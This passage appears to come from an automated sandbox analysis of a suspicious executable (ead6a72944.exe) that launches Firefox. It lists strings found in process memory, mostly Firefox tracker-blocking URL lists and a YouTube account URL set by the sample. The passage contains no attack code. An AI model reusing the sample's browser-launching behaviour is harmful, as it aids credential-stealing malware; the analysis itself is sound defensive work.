"://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: efox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/acc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: empTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://en.wikipedia.org/wiki/Special:Search://www.facebook.com/platform/impression.php://.adsafeprotected.com//unit/*sessionstore-final-state-write-complete equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account`T equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: main/anti-tracking-url-decoration"://.adsafeprotected.com/.png""://.adsafeprotected.com/jload""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com//unit/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//Serving/""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/jload?""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/jsvid""://trends.google.com/trends/embed""://.adsafeprotected.com/tpl?""://trends.google.com/trends/embed"getProfileDataAsGzippedArrayBuffermain/search-default-override-allowlistmain/translations-identification-models"://.adsafeprotected.com/.gif""://.adsafeprotected.com//imp/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js"["://trends.google.com/trends/embed"]main/anti-tracking-url-decorationmain/devtools-compatibility-browsers"://vast.adsafeprotected.com/vast"main/websites-with-shared-credential-backends60e82333-914d-4cfa-95b1-5f034b5a704b["://trends.google.com/trends/embed"]media.videocontrols.picture-in-picture.enabledPictureInPicture:EnableSubtitlesButtonresource://gre/modules/UpdateUtils.sys.mjspictureinpicture.most_concurrent_playerspictureInPictureToggleContextMenucontext_MovePictureInPictureTogglepicture-in-picture-move-toggle-rightEmpty rectangles do not have centerscontentBlockingAllowListPrincipalresource:///modules/AttributionCode.sys.mjsFX_PICTURE_IN_PICTURE_WINDOW_OPEN_DURATIONget contentBlockingAllowListPrincipalresolveOverlapConflicts/closestCandidate<chrome://browser/content/browser.xhtml equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: requestingCssToDesktopScaleBROWSER_READY_NOTIFICATIONsessionstore-windows-restoredprivilegedAboutProcessEnabledInvalid LaterRun page URL get activityStreamEnabled#picture-in-picture-buttonget shouldResistFingerprintingfocusedContentBrowsingContextkey_togglePictureInPicturepictureinpicture.settingsclosePipWindow/closedPromise<Insecure LaterRun page URL kSelfDestructSessionLimitPREF_ACTIVITY_STREAM_DEBUGupdatePlayingDurationHistogramsaddOriginatingWinToWeakMapremovePiPBrowserFromWeakMapremoveOriginatingWinFromWeakMap#respect-pipDisabled-switchpicture-in-picture-buttonsetOriginatingWindowActivecandidateDistanceToConflictvalidate/chromeModifiers<windowGlobalPipCountGeneratorPictureInPicture:UrlbarToggleget documentStoragePrincipalget contentBlockingEventsPictureInPicture:KeyToggleresolveOverlapConflicts/<PipScreenCssToDesktopScale#PictureInPicturePanelTemplate--newtab-text-primary-color--toolbarbutton-hover-background--toolbar-field-border-color--tabpanel-background-colordefault-theme@mozilla.org--newtab-background-colorlightweight-theme-styling-updateset onmozorientationchange--toolbar-field-focus-colorget onmozorientationchangetoolbar_field_highlight_textbrowser.theme.toolbar-themelwt-default-theme-in-dark-mode--lwt-background-alignment--lwt-toolbar-field-highlight--lwt-accent-color-inactive_alreadyRecordedTopsitesPainted_unsubscribeFromActivityStream--toolbar-field-background-color_determineIfColorPairIsDark_determineToolbarAndContentThemebrowser.theme.content-themetoolbar_vertical_separator--chrome-content-separator-color--toolbarbutton-icon-fill_subscribeToActivityStreamaboutHomeTopsitesFirstPaint--arrowpanel-border-colorlwt-toolbar-field-brighttextmaybeRecordTopsitesPainted--sidebar-background-colortoolbar_field_border_focusdocument-element-inserteddocument-element-insertedgetSubpropertiesForCSSPropertydocument-element-insertedLOAD_FLAGS_FORCE_ALLOW_COOKIESgetOverflowingChildrenOfElementLOAD_FLAGS_ERROR_LOAD_CHANGES_RVget mergeAttributeRecordshttps://www.youtube.com/accountwebCOOP+COEP=https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-insertedbound _updateEnabledStatePartitioningExceptionListServicedocument-element-insertedLOAD_FLAGS_USER_ACTIVATIONset mergeAttributeRecordsbound fixupAndLoadURIStringhttps://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeatureUpdate:majorRelease2022getAllStyleSheetCSSStyleRulesdocument-element-insertedbrowser.newtabpage.enableddocument-element-insertedwebIsolated=https://youtube.comevictOutOfRangeContentViewersfeatureUpdate:firefoxViewNextgetRegisteredCssHighlightsunregisterExceptionListObserverservices.sync.lastTabFetchcustomizableui-special-spring2bound handleWidgetCommand#urlbar-search-mode-indicator_searchModeIndicatorClosedraggableregionleftmousedownexperimental.hideHeuristicFirefoxViewNotificationManager<isPersistedSearchTermsEnabledshouldHandOffToSearchModensIURLQueryStringStripperQUERY_STRIPPING_STRIP_ON_SHAREgetOriginalUrl
Source: firefox.exe, 00000021.00000003.2708137723.000001E53926D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation'9 equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704593283.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ta\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2916024047.00000261935B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2916024047.0000026193568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", 